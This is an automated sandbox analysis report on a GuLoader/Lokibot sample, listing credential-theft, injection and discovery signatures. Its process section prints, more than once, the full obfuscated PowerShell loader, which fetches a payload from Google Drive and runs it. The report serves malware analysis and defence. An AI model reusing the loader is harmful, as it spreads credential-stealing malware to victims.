Malware Analysis Report

2024-11-30 23:47

Sample ID 240916-v5cn4szhra
Target 1586e028a5ba230eb36d3cae8bafbc5cb7632d9d8dbb3d697e082474efa53da5
SHA256 1586e028a5ba230eb36d3cae8bafbc5cb7632d9d8dbb3d697e082474efa53da5
Tags
guloader lokibot collection credential_access discovery downloader spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1586e028a5ba230eb36d3cae8bafbc5cb7632d9d8dbb3d697e082474efa53da5

Threat Level: Known bad

The file 1586e028a5ba230eb36d3cae8bafbc5cb7632d9d8dbb3d697e082474efa53da5 was found to be: Known bad.

Malicious Activity Summary

guloader lokibot collection credential_access discovery downloader spyware stealer trojan

Lokibot

Guloader,Cloudeye

Credentials from Password Stores: Credentials from Web Browsers

Blocklisted process makes network request

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Accesses Microsoft Outlook profiles

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

outlook_office_path

outlook_win_path

Suspicious behavior: MapViewOfSection

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-09-16 17:33

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-16 17:33

Reported

2024-09-16 17:36

Platform

win7-20240903-en

Max time kernel

141s

Max time network

144s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Document BT24·pdf.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

Lokibot

trojan spyware stealer lokibot

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wabmig.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wabmig.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wabmig.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2592 set thread context of 2376 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\windows mail\wabmig.exe N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wabmig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2132 wrote to memory of 2800 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2132 wrote to memory of 2800 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2132 wrote to memory of 2800 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2800 wrote to memory of 2556 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2800 wrote to memory of 2556 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2800 wrote to memory of 2556 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2800 wrote to memory of 2924 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2800 wrote to memory of 2924 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2800 wrote to memory of 2924 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2924 wrote to memory of 2592 N/A C:\Windows\system32\cmd.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2924 wrote to memory of 2592 N/A C:\Windows\system32\cmd.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2924 wrote to memory of 2592 N/A C:\Windows\system32\cmd.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2924 wrote to memory of 2592 N/A C:\Windows\system32\cmd.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2592 wrote to memory of 1600 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2592 wrote to memory of 1600 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2592 wrote to memory of 1600 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2592 wrote to memory of 1600 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2592 wrote to memory of 2376 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 2592 wrote to memory of 2376 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 2592 wrote to memory of 2376 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 2592 wrote to memory of 2376 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 2592 wrote to memory of 2376 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 2592 wrote to memory of 2376 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Document BT24·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Undeductible Erklrende Scrutinising #>;$Unidigitate='Paggle';<#Gennemsnitslager Blegeste parasolette Bankrolling Pullman #>;$Lyophile=$host.PrivateData;If ($Lyophile) {$Fichuet++;}function Bevandret($Chay){$Akkordeoner10=$Chay.Length-$Fichuet;for( $Catering=5;$Catering -lt $Akkordeoner10;$Catering+=6){$Sortbrshandel228+=$Chay[$Catering];}$Sortbrshandel228;}function Levir($Circumtonsillar){ & ($Locusting144) ($Circumtonsillar);}$Mats=Bevandret 'PressMGaussoSvajrzIstaniSpra,lFlenslBenziaDokt /Ar.he5Sub r. Zuri0Akk r .dgi(Expr Wg naaiAlsacnDecimdCatasoOctadw equis Trai SeedN TegnT inis Desti1 Comb0Epige.Model0 Flat;Cant exanW P epiaristnOv,rs6Gru,d4Porse;Sturt AfgifxTilt 6Cling4,isto;legis McginrAssigvVapor:Aldol1Frogl2Zardm1Doven.kae l0Dob e)Efter PolyGUnipeeCrowncBlis,kNapifoListe/ Half2 Sy e0Prepe1,pina0 riss0Amtsg1Ala k0Smelt1d.mme Beti,Fe anaiDob.erTilsieMontrfMultiolns.ix Poe./Hipp,1Tilba2 Bele1 Reco.Unnom0Forte ';$Cateringlario=Bevandret 'K.svauo.erasPalpeEVess.RAbort-FrdigAbagsigTmmereAlminn Pa tterhve ';$Kropssprog=Bevandret 'Frimrh,lokkt odeltEmulspAc,uis inde: Ska./Stigr/HereddImarer Re uiTuffev odbe Bind.tovnigGuateoU faroParkegInterlbund eStege.SystucOversoP,rmemSvuls/ BloduApparcLin e?A opeeSchtixOr,efpInstro U flr B,ldtMogot= GrundPlastono.fow da anA.thrlTiljuoS.mora .enndUpflu&Pomo i Tem.dUnm v=Insid1 ntelASvajeRPre oF P stM WhitqRurergT.lriQHo ca9,roemHSmergy oghamChampLRi gepFolebwVrget2HolocXSemesoProjeiTriksFfriedgRhodag conc4Befol4ChronfDupliTTrkl,bS,lteWPrfa,Z Hovey Non NSqui,KRer gOUbeta ';$Nitrosite=Bevandret 'Besti>Su.er ';$Locusting144=Bevandret 'concriEnd ce C,keXGenkb ';$Abdicator='Suldans';$Dicatalectic = Bevandret 'TransePrdikc olamh lleoAbbey Refri%Beaveahaglbp,rayep Ringd algbaE foltDesina acht%Uns,m\Bev sNp rtmo,axonnAftrka RosepKv,lioD,spisMi jttImmunaMedlet Tridi .otlzCo iciFindynPengeg Tress Yabu.AbstrN muraosest,nSkr,e Unma&Glott&Rugni Reduce ominc reskh Resho Fy r Ki kutUlpmi ';Levir (Bevandret 'Palat$RichegGidsel rffeoMinerb ,evoaAstralampel:AntisEA.hopn F.nej O deeUdvidtMoti,=Stili(B rikcBrasem PremdVerni Skbn./ ThebcEvang Agram$DowdiDPrepri rbejcK,leraGrovdtAnsttaEk.emlBir heAttlecHusmnt Tyr iInvescUn og) Ungk ');Levir (Bevandret ' Spu $Ild bgPitomlBefrioE ersbKlim,aM jeml Maal:Do keW Supre AutoeGa sskTiltae .aanndaugad magfGreylr rkrei P ectpervi=Forrd$t murKUo.fir mangoSuf.opAltersOpsnasIn,erpattr rnondeoUdeergEnmes.pr grs FastpLufttlPern iBuf etA.tma( kole$ChimnNHovedi GenetAutomr BrunoSteddsInfigiTanket Ca.aeCache)Unhou ');Levir (Bevandret 'Res r[Bi elNA dele HjertBalli.Kol,kSVa uuecammerKnavevSp oni Stalct ange JamaP St xoEnfeti JernnInkakt DramMHvil.a milin orsyaUnderg MinieTegnerStrit] Stro:Barre:IntenSkapnieSprric aturuF rber Ski,iOverctLeucoyDamn PEksperNitroo SysttKedeloFeriecAutokoKoksel unk Juri =.heat Eriks[ Slv.NCentreAnmastDem r. ReinS DroseOmkrscHologuFlipdrElmaaiLimnotB achyNevscPopsenrDaakao echyt F.broTeroscBoligoCau.alPo luTIndbyy Non pAmoebeKlie ]Fi it:Inval: tatuTParahlTriumsForbe1Perit2Makro ');$Kropssprog=$Weekendfrit[0];$undrunken= (Bevandret 'Unwat$tamp gTe.delTutteOYoungBkogepavok.elEa th:Raakah oldsA BagdV SpalB Ril iT sseODistol KamcoUndvigConstIFo,ktS,eassK M ds=Ap ean jeneE NutswS.ole-FraskoMicroBYrk rJShamoEDek pcFjodoTSuper ZippSJok sYKos.esRev et AbioERastpmMass . Retrn L ukEBedewt Trau.CrucewFodnoECongobSabziCtilkaL LectiT dimEtertuNTermot');$undrunken+=$Enjet[1];Levir ($undrunken);Levir (Bevandret 'Stern$Jarl h AnegaKvartvDicerbSolceiCi,cuoBegunl lhexoBoratgImmigiSalifsOu pekPukke.Amal H TeeteChitta KlosdUnwateDragsropl tsFo sk[Const$ForbrCBindia inintLseneePicayrSour iLi nin .otag nitlSandca ensrRedemiRomeroKruge]Toler= ravi$De,tiM RdstaOve et ChlosSa.me ');$Evese=Bevandret 'Lice $Langehbaan a BearvFag obNephriReconoMatril Proco Re ngLifeliSkihesTryghkIndep.InterDChelooUlejlw B.rnn BelalCapsuosold aGuttid Uni FFiguri Gi.pl PrteeAnfly(E,ten$AcadeKCompur alpeoDend.punfrusIndspsPresip evor AntnoTran g Svan,Sreje$ pulsMTungsu Kludl rkaitC,poniAto adAf,tie,xidanForlyosulphmC,anciNodu,nPhiloast,tutElysiiSmothoPsit n Turia ylonlDetin)Solmi ';$Multidenominational=$Enjet[0];Levir (Bevandret 'Forre$ PartgKatatlU.whiOEpitoBPokeraPayabLC pta:Anta DGrumsaAsla RAcmatTSgneda verhg vedN as,rAParlanAuton= Py.i(Gr.viTSigbeEPetrosCortitBortk-Arbejpfis eA ijuTLdaasHSy os Disce$K.nvoMSysilUMyxopLm.terthead IsockmDKakotERin nNGrafiO virkmSixtyI Amb nfremkaIdriftKostpiDestaOHose nNymphaAnhngLFlipp)De kl ');while (!$Dartagnan) {Levir (Bevandret 'Annui$Ting,gUnfrul Dul o KludbMlle a Fejll ch m:pr.toSOpfathTus haI.dusbSubmoaBiggesFabulhNnsom=Malor$B efotExilirPs uduS aireIse k ') ;Levir $Evese;Levir (Bevandret 'FljetSDgnratScollaC arkr tifttPa,ag-RaglaSToccal RkeneBandledosimp ini gow s4Skyde ');Levir (Bevandret 'Brisk$ Progg partlBilleoVikinbSkakta ThrulSnnek:NaragD Smrsa CoedrN,ncotS tsfadiffugAc.din ChetaAratinSoffi=Tab n( StriTFrstee atsusVidertEkspo-Fori PRepreaBver.tGloheh O.di Askeb$ SkjoMS,akkuAnklalVanditslimiiDentidGa.rne IntenNegleo raemDealliOve rnPseudaSagsbt ensliAncisoMinkinAfln aUnedgl redi)Wh op ') ;Levir (Bevandret 'Net.p$ RivugF brilPostuo Fregbls.laaLivs,l Inde:Hy erDInduseColornln,ero IsoltK rkea OvertPapi u HolimS pho= Unde$PopligBags lresero nticbOlde aGrundlDad i: ClapOGandhpJ,lpapSkriviDr abdMateraTusinnTumpfs Swim+Overh+fodbo%Urteg$TrompWFibrie melleFigurkfoxlieUndernTumtudTinpefSuperrSwankiTiddytVenli.A,klac xpanoCes ku ItainSmrebtInco. ') ;$Kropssprog=$Weekendfrit[$Denotatum];}$Antisiphon47=335402;$filnumre=29061;Levir (Bevandret 'Slutn$Telefg RaadlStenkoSeignb PostaPosnilSpred: enelOSkraavUneneeElevrrForsnmUdle,iLinielNonchiDiagntJu,ioaAweatrDisiliV rucs welltE,ageiPrdikcUnrec ,ucc= Betj MasocGPreboeBevrttTangn-hetaeCCarsmoEpiton ,ncotHypereForton U detLderr Papel$HulkiMCanosuhaandlKissmtMezzoiDollmdPhonae allunRefo o A chmFriv i ubcanSubspaFle btfaksiiSmittoSightnE genaCommel ilte ');Levir (Bevandret 'Cuboi$Em.owgInadhl SulfoPrimrb Han aCog,ol Loft:PumpeSArbejpTr ruoPacetrHieraiinvolnGradag nbros,kibssProprt HurwaAnnult Co tiBes,ooInfilnUns,neMotorrslang C,rtw=,ntra Hyper[Blu.bSDiscryCatvusHobhotLuxu,eTilr m For .OstecCLinieoudspenvolosvLid,aeProlirUdvirtSkopu]Statu:aarti: KronFWernar Dento Co am JustB ChecaMeje,sggeble Fung6Eolop4ant cSsporvtGeleer.emini Un dnAvertg Cita( rick$EternONdkskvdisc e BombrHuggem Bin,iHors lPerfeiOplystGalataContrr OrlaiN,npasOver tHebdoiUndescRepro) ouce ');Levir (Bevandret 'budd $TappegJ ddyl SecuoForsgb T blaNrofflFract: toppOHushouTetantRegnesPatrutOverhiSl,ernFummmgDe.ar H.rod=Iron, Bakk[ bro.S MarcyPerpesSwirrtPanameSpatim Regn.T,adeT ArbeePins xFlagstInter.HypsiE SjllnAgen.c SkrvocarvodJe.emiFranknUnsa gDatao]Advar:Rifle:Des gAPolysSH emsCKiltiI ydskIHalvr.RasteGFngseePe titAnimiS Plait pildrS ormiReimanEfte gKonc.(Wh el$Anti,SCoho,pPropro TonirAut riCoynunFrilagMindls.ullas DeprtGut ia C stt UdmniAn.eloSlappnperfeeTicktrStats) lvsm ');Levir (Bevandret ' Fler$Unbrugfl,xilOutgroFla sb,arbeaUnl,nlFlus :PleocHDestieInde rNeutraAndelu aselsO,erm= Ov.r$CisteONyerhu Warft asersUna,ftScarciF tidn janigRyge .Kiti scoop.uTrkerb uarsPo,tct nmagr,artii Nonsn ShahgSkval( K va$,erisA IngunStenotGudmdisubtlsS mmeiAr,anpNedruhReageo ndernthyr.4 lect7Uncov, Halv$HousefDer,ni annlAr,ognReassuAutormAntenr regneTarif)Ca ak ');Levir $Heraus;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Nonapostatizings.Non && echo t"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Undeductible Erklrende Scrutinising #>;$Unidigitate='Paggle';<#Gennemsnitslager Blegeste parasolette Bankrolling Pullman #>;$Lyophile=$host.PrivateData;If ($Lyophile) {$Fichuet++;}function Bevandret($Chay){$Akkordeoner10=$Chay.Length-$Fichuet;for( $Catering=5;$Catering -lt $Akkordeoner10;$Catering+=6){$Sortbrshandel228+=$Chay[$Catering];}$Sortbrshandel228;}function Levir($Circumtonsillar){ & ($Locusting144) ($Circumtonsillar);}$Mats=Bevandret 'PressMGaussoSvajrzIstaniSpra,lFlenslBenziaDokt /Ar.he5Sub r. Zuri0Akk r .dgi(Expr Wg naaiAlsacnDecimdCatasoOctadw equis Trai SeedN TegnT inis Desti1 Comb0Epige.Model0 Flat;Cant exanW P epiaristnOv,rs6Gru,d4Porse;Sturt AfgifxTilt 6Cling4,isto;legis McginrAssigvVapor:Aldol1Frogl2Zardm1Doven.kae l0Dob e)Efter PolyGUnipeeCrowncBlis,kNapifoListe/ Half2 Sy e0Prepe1,pina0 riss0Amtsg1Ala k0Smelt1d.mme Beti,Fe anaiDob.erTilsieMontrfMultiolns.ix Poe./Hipp,1Tilba2 Bele1 Reco.Unnom0Forte ';$Cateringlario=Bevandret 'K.svauo.erasPalpeEVess.RAbort-FrdigAbagsigTmmereAlminn Pa tterhve ';$Kropssprog=Bevandret 'Frimrh,lokkt odeltEmulspAc,uis inde: Ska./Stigr/HereddImarer Re uiTuffev odbe Bind.tovnigGuateoU faroParkegInterlbund eStege.SystucOversoP,rmemSvuls/ BloduApparcLin e?A opeeSchtixOr,efpInstro U flr B,ldtMogot= GrundPlastono.fow da anA.thrlTiljuoS.mora .enndUpflu&Pomo i Tem.dUnm v=Insid1 ntelASvajeRPre oF P stM WhitqRurergT.lriQHo ca9,roemHSmergy oghamChampLRi gepFolebwVrget2HolocXSemesoProjeiTriksFfriedgRhodag conc4Befol4ChronfDupliTTrkl,bS,lteWPrfa,Z Hovey Non NSqui,KRer gOUbeta ';$Nitrosite=Bevandret 'Besti>Su.er ';$Locusting144=Bevandret 'concriEnd ce C,keXGenkb ';$Abdicator='Suldans';$Dicatalectic = Bevandret 'TransePrdikc olamh lleoAbbey Refri%Beaveahaglbp,rayep Ringd algbaE foltDesina acht%Uns,m\Bev sNp rtmo,axonnAftrka RosepKv,lioD,spisMi jttImmunaMedlet Tridi .otlzCo iciFindynPengeg Tress Yabu.AbstrN muraosest,nSkr,e Unma&Glott&Rugni Reduce ominc reskh Resho Fy r Ki kutUlpmi ';Levir (Bevandret 'Palat$RichegGidsel rffeoMinerb ,evoaAstralampel:AntisEA.hopn F.nej O deeUdvidtMoti,=Stili(B rikcBrasem PremdVerni Skbn./ ThebcEvang Agram$DowdiDPrepri rbejcK,leraGrovdtAnsttaEk.emlBir heAttlecHusmnt Tyr iInvescUn og) Ungk ');Levir (Bevandret ' Spu $Ild bgPitomlBefrioE ersbKlim,aM jeml Maal:Do keW Supre AutoeGa sskTiltae .aanndaugad magfGreylr rkrei P ectpervi=Forrd$t murKUo.fir mangoSuf.opAltersOpsnasIn,erpattr rnondeoUdeergEnmes.pr grs FastpLufttlPern iBuf etA.tma( kole$ChimnNHovedi GenetAutomr BrunoSteddsInfigiTanket Ca.aeCache)Unhou ');Levir (Bevandret 'Res r[Bi elNA dele HjertBalli.Kol,kSVa uuecammerKnavevSp oni Stalct ange JamaP St xoEnfeti JernnInkakt DramMHvil.a milin orsyaUnderg MinieTegnerStrit] Stro:Barre:IntenSkapnieSprric aturuF rber Ski,iOverctLeucoyDamn PEksperNitroo SysttKedeloFeriecAutokoKoksel unk Juri =.heat Eriks[ Slv.NCentreAnmastDem r. ReinS DroseOmkrscHologuFlipdrElmaaiLimnotB achyNevscPopsenrDaakao echyt F.broTeroscBoligoCau.alPo luTIndbyy Non pAmoebeKlie ]Fi it:Inval: tatuTParahlTriumsForbe1Perit2Makro ');$Kropssprog=$Weekendfrit[0];$undrunken= (Bevandret 'Unwat$tamp gTe.delTutteOYoungBkogepavok.elEa th:Raakah oldsA BagdV SpalB Ril iT sseODistol KamcoUndvigConstIFo,ktS,eassK M ds=Ap ean jeneE NutswS.ole-FraskoMicroBYrk rJShamoEDek pcFjodoTSuper ZippSJok sYKos.esRev et AbioERastpmMass . Retrn L ukEBedewt Trau.CrucewFodnoECongobSabziCtilkaL LectiT dimEtertuNTermot');$undrunken+=$Enjet[1];Levir ($undrunken);Levir (Bevandret 'Stern$Jarl h AnegaKvartvDicerbSolceiCi,cuoBegunl lhexoBoratgImmigiSalifsOu pekPukke.Amal H TeeteChitta KlosdUnwateDragsropl tsFo sk[Const$ForbrCBindia inintLseneePicayrSour iLi nin .otag nitlSandca ensrRedemiRomeroKruge]Toler= ravi$De,tiM RdstaOve et ChlosSa.me ');$Evese=Bevandret 'Lice $Langehbaan a BearvFag obNephriReconoMatril Proco Re ngLifeliSkihesTryghkIndep.InterDChelooUlejlw B.rnn BelalCapsuosold aGuttid Uni FFiguri Gi.pl PrteeAnfly(E,ten$AcadeKCompur alpeoDend.punfrusIndspsPresip evor AntnoTran g Svan,Sreje$ pulsMTungsu Kludl rkaitC,poniAto adAf,tie,xidanForlyosulphmC,anciNodu,nPhiloast,tutElysiiSmothoPsit n Turia ylonlDetin)Solmi ';$Multidenominational=$Enjet[0];Levir (Bevandret 'Forre$ PartgKatatlU.whiOEpitoBPokeraPayabLC pta:Anta DGrumsaAsla RAcmatTSgneda verhg vedN as,rAParlanAuton= Py.i(Gr.viTSigbeEPetrosCortitBortk-Arbejpfis eA ijuTLdaasHSy os Disce$K.nvoMSysilUMyxopLm.terthead IsockmDKakotERin nNGrafiO virkmSixtyI Amb nfremkaIdriftKostpiDestaOHose nNymphaAnhngLFlipp)De kl ');while (!$Dartagnan) {Levir (Bevandret 'Annui$Ting,gUnfrul Dul o KludbMlle a Fejll ch m:pr.toSOpfathTus haI.dusbSubmoaBiggesFabulhNnsom=Malor$B efotExilirPs uduS aireIse k ') ;Levir $Evese;Levir (Bevandret 'FljetSDgnratScollaC arkr tifttPa,ag-RaglaSToccal RkeneBandledosimp ini gow s4Skyde ');Levir (Bevandret 'Brisk$ Progg partlBilleoVikinbSkakta ThrulSnnek:NaragD Smrsa CoedrN,ncotS tsfadiffugAc.din ChetaAratinSoffi=Tab n( StriTFrstee atsusVidertEkspo-Fori PRepreaBver.tGloheh O.di Askeb$ SkjoMS,akkuAnklalVanditslimiiDentidGa.rne IntenNegleo raemDealliOve rnPseudaSagsbt ensliAncisoMinkinAfln aUnedgl redi)Wh op ') ;Levir (Bevandret 'Net.p$ RivugF brilPostuo Fregbls.laaLivs,l Inde:Hy erDInduseColornln,ero IsoltK rkea OvertPapi u HolimS pho= Unde$PopligBags lresero nticbOlde aGrundlDad i: ClapOGandhpJ,lpapSkriviDr abdMateraTusinnTumpfs Swim+Overh+fodbo%Urteg$TrompWFibrie melleFigurkfoxlieUndernTumtudTinpefSuperrSwankiTiddytVenli.A,klac xpanoCes ku ItainSmrebtInco. ') ;$Kropssprog=$Weekendfrit[$Denotatum];}$Antisiphon47=335402;$filnumre=29061;Levir (Bevandret 'Slutn$Telefg RaadlStenkoSeignb PostaPosnilSpred: enelOSkraavUneneeElevrrForsnmUdle,iLinielNonchiDiagntJu,ioaAweatrDisiliV rucs welltE,ageiPrdikcUnrec ,ucc= Betj MasocGPreboeBevrttTangn-hetaeCCarsmoEpiton ,ncotHypereForton U detLderr Papel$HulkiMCanosuhaandlKissmtMezzoiDollmdPhonae allunRefo o A chmFriv i ubcanSubspaFle btfaksiiSmittoSightnE genaCommel ilte ');Levir (Bevandret 'Cuboi$Em.owgInadhl SulfoPrimrb Han aCog,ol Loft:PumpeSArbejpTr ruoPacetrHieraiinvolnGradag nbros,kibssProprt HurwaAnnult Co tiBes,ooInfilnUns,neMotorrslang C,rtw=,ntra Hyper[Blu.bSDiscryCatvusHobhotLuxu,eTilr m For .OstecCLinieoudspenvolosvLid,aeProlirUdvirtSkopu]Statu:aarti: KronFWernar Dento Co am JustB ChecaMeje,sggeble Fung6Eolop4ant cSsporvtGeleer.emini Un dnAvertg Cita( rick$EternONdkskvdisc e BombrHuggem Bin,iHors lPerfeiOplystGalataContrr OrlaiN,npasOver tHebdoiUndescRepro) ouce ');Levir (Bevandret 'budd $TappegJ ddyl SecuoForsgb T blaNrofflFract: toppOHushouTetantRegnesPatrutOverhiSl,ernFummmgDe.ar H.rod=Iron, Bakk[ bro.S MarcyPerpesSwirrtPanameSpatim Regn.T,adeT ArbeePins xFlagstInter.HypsiE SjllnAgen.c SkrvocarvodJe.emiFranknUnsa gDatao]Advar:Rifle:Des gAPolysSH emsCKiltiI ydskIHalvr.RasteGFngseePe titAnimiS Plait pildrS ormiReimanEfte gKonc.(Wh el$Anti,SCoho,pPropro TonirAut riCoynunFrilagMindls.ullas DeprtGut ia C stt UdmniAn.eloSlappnperfeeTicktrStats) lvsm ');Levir (Bevandret ' Fler$Unbrugfl,xilOutgroFla sb,arbeaUnl,nlFlus :PleocHDestieInde rNeutraAndelu aselsO,erm= Ov.r$CisteONyerhu Warft asersUna,ftScarciF tidn janigRyge .Kiti scoop.uTrkerb uarsPo,tct nmagr,artii Nonsn ShahgSkval( K va$,erisA IngunStenotGudmdisubtlsS mmeiAr,anpNedruhReageo ndernthyr.4 lect7Uncov, Halv$HousefDer,ni annlAr,ognReassuAutormAntenr regneTarif)Ca ak ');Levir $Heraus;"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Undeductible Erklrende Scrutinising #>;$Unidigitate='Paggle';<#Gennemsnitslager Blegeste parasolette Bankrolling Pullman #>;$Lyophile=$host.PrivateData;If ($Lyophile) {$Fichuet++;}function Bevandret($Chay){$Akkordeoner10=$Chay.Length-$Fichuet;for( $Catering=5;$Catering -lt $Akkordeoner10;$Catering+=6){$Sortbrshandel228+=$Chay[$Catering];}$Sortbrshandel228;}function Levir($Circumtonsillar){ & ($Locusting144) ($Circumtonsillar);}$Mats=Bevandret 'PressMGaussoSvajrzIstaniSpra,lFlenslBenziaDokt /Ar.he5Sub r. Zuri0Akk r .dgi(Expr Wg naaiAlsacnDecimdCatasoOctadw equis Trai SeedN TegnT inis Desti1 Comb0Epige.Model0 Flat;Cant exanW P epiaristnOv,rs6Gru,d4Porse;Sturt AfgifxTilt 6Cling4,isto;legis McginrAssigvVapor:Aldol1Frogl2Zardm1Doven.kae l0Dob e)Efter PolyGUnipeeCrowncBlis,kNapifoListe/ Half2 Sy e0Prepe1,pina0 riss0Amtsg1Ala k0Smelt1d.mme Beti,Fe anaiDob.erTilsieMontrfMultiolns.ix Poe./Hipp,1Tilba2 Bele1 Reco.Unnom0Forte ';$Cateringlario=Bevandret 'K.svauo.erasPalpeEVess.RAbort-FrdigAbagsigTmmereAlminn Pa tterhve ';$Kropssprog=Bevandret 'Frimrh,lokkt 